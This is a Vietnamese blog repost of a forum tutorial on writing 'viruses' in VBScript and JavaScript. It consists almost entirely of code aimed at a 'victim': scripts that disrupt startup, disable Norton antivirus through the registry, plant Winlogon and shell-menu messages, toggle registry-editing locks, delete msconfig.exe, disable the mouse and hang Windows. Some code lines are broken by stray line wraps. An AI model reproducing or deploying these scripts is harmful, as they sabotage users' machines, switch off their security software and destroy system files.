Trao đổi với tôi

http://www.buidao.com

7/22/09

[Virus] Hướng dẫn lập trình virus bằng Vbs.

Link: http://virusvn.com/forum/showthread.php?t=310

Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi:

Dưới đây là code của một số con virus nhỏ dưới dạng VBS:

1.Không cho victim khởi động máy:

Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"


2. Disable NAV:

Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic
es\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"


3. Hiển thị một message mỗi khi reboot máy:

dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win
Logon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Hi ! Toi la TrungWK- Toi den tu Chip&Kitty.tk"


4. Hiển thị một dòng lệnh khi click vào file hay folder:,

set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK tu Chip&Kitty.tk"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK tu Chip&Kitty.tk\","Robinhood"


5. Làm cho các trò trên hoạt động bình thường:

Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\. Default\Software\Microsoft\Windows\CurrentVersion\
"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"

Dưới dạng Javascipt :

var wsh;
wsh=new ActiveXObject ("Wscript.shell");


// Winlogon when reboot


var s1 = " HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
\\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Hi ! Toi la Anti_Love. Toi den tu Chip&Kitty.com") ;

//Disable Registry
var s1 = "HKEY_USERS\\. Default\\Software\\Microsoft\\Windows\\CurrentVers
ion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");


//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn

var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;


//Shutdown windows

//Disable Mouse

wsh.run ("RUNDLL32.EXE mouse,disable");


//Hang up windows

wsh.run ("rundll32 user,disableoemlayer");

nguồn: sưu tầm
Được đăng bởi Lúc